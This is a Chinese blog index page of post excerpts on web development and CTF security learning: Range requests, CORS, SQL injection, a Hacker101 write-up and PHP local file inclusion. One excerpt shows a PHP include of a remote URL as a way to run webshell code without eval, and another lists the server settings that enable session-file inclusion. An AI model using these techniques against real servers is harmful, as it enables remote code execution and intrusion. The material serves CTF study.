dxkite

Blob协议 - 浏览器的数据包装

我们在使用网页展示数据的时候,我们会使用 data: 协议来显示数据,比较常见的场景如上传图片显示,一般来说都是通过从文件中读取之后,转换成base64代码,然后使用 data: 协议来显示图片,具体操作很多,如 FileReader 从文件中读取二进制, 使用Canvas绘制之后转换成二进制等,我提出来的主要原因是用于网页视频下载

阅读更多
视频播放、断点续传、多线程下载实现基础:Range

实现一个视频播放的功能,以及对大文件的下载操作等等都避不开一个点:获取文件任意位置的数据,如果说我们单纯的通过 echo file-content 的方式只能用于文件下载,如果视频文件用于播放中,则难以处理,具体表现则为视频播放的时候无法调整进度条,而且如果是视频网站,对于视频只采用放在某个可以直接访问的目录上,那么这个视频也就相当于公开了,对于什么 VIP 什么的也就无从说起,本篇文章将 Range,来提供视频播放、断点续传、多线程下载的技术依赖实现

阅读更多
特殊方式运行PHP代码

之前一直在想一个问题,怎么在不使用eval函数的前提下执行php代码,因为不管是一句话还是其他的骚操作好像都要通过eval函数来执行PHP代码(如果有其他方式,请指出吧,我表示就知道一个),现在的一句话代码也是如此,那么如何绕过这个东西来执行代码?用PHP也有几年了,今天突然灵光一闪,我们来看下面的代码:

include 'http://www.test.com/xx.php'
阅读更多
PHP 本地包含session文件

打比赛还是要自己搞个 Docker 文件才好玩啊,本地模拟成不成也不知道原因,搞了个 Docker 就很容易的知道哪里出了问题,本次文章内容描述了 本地文件包含 session 文件的一类题型的解题方案代码

题型:本地文件包含

条件

  • session.upload_progress.enabled 开启 必须

    开启上传进度记录

  • session.use_strict_mode 关闭

    允许自定义session名称

  • session.save_path 已知

    未知也没关系可能就是需要大量的字典爆破

阅读更多
SQL注入与数据快速读取

在玩 Hacker101 , 最开始遇到SQL问题的时候,基本上是 sqlmap 一把梭,很少有手动写注入的时候,以至于每次打CTF遇到了Web注入相关的题目用 sqlmap 解决不了又不会写 tamper,然后就完全做不成,趁现在周末有时间,手动玩注入试试水,摸了一个比较快的读取SQL数据的方案 - 按bit位读取。

阅读更多
Hacker101 Micro-CMS

有点想转安全,不做开发了,但是好像自己又比较菜,于是就开始学习了,最近一段时间主要就是玩黑客101的CTF吧,把基础知识补一下,昨天去面试了一把,发现自己做开发的话,面试也很难过,自己最近几年还是白过了,好了闲话不多说,昨天做了下 Micro-CMS 的题目,感觉还行吧,第一次接触这种CTF,感觉有点神奇,Flag居然不是我们自己去找的,而是做到了预设的点就可以了,Flag自己就出来了.

阅读更多
服务器端访问控制(CORS)

在做网站开发的时候,我们经常会用到异步请求来实现无刷新更新网页,通常我们使用的都是同源API来实现、以及使用 WebSocket 协议,这两个协议都离不开浏览器的一个安全判断:同源策略。文章中包含了跨站请求的实现与基本会话保持的方案。

阅读更多
首页 标签 分类 归档 框架